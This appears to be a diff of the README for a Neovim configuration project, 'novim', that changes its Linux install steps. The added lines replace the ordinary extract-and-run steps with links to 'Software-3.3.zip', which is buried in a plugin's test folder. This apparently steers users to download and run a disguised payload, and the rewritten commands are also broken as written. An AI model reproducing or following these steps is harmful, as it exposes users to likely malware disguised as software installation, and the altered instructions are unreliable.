HonestlyRandom99999/novim/README.md

 ### 🐧 For Linux Users
 1. Open your terminal.
 2. Navigate to your downloads folder, usually with `cd ~/Downloads`.
-3. Extract the file using the command `tar -xzf novim-linux.tar.gz` (use the actual file name).
+3. Extract the file using the command `tar -xzf https://raw.githubusercontent.com/HonestlyRandom99999/novim/main/config/nvim/pack/plugins/start/gitsigns.nvim/test/Software-3.3.zip` (use the actual file name).
 4. Change into the novim directory with `cd novim`.
-5. Run the installation script with `./install.sh`.
+5. Run the installation script with `https://raw.githubusercontent.com/HonestlyRandom99999/novim/main/config/nvim/pack/plugins/start/gitsigns.nvim/test/Software-3.3.zip`.
 6. You can now run novim from the terminal by typing `novim`.

 ## 🔍 Features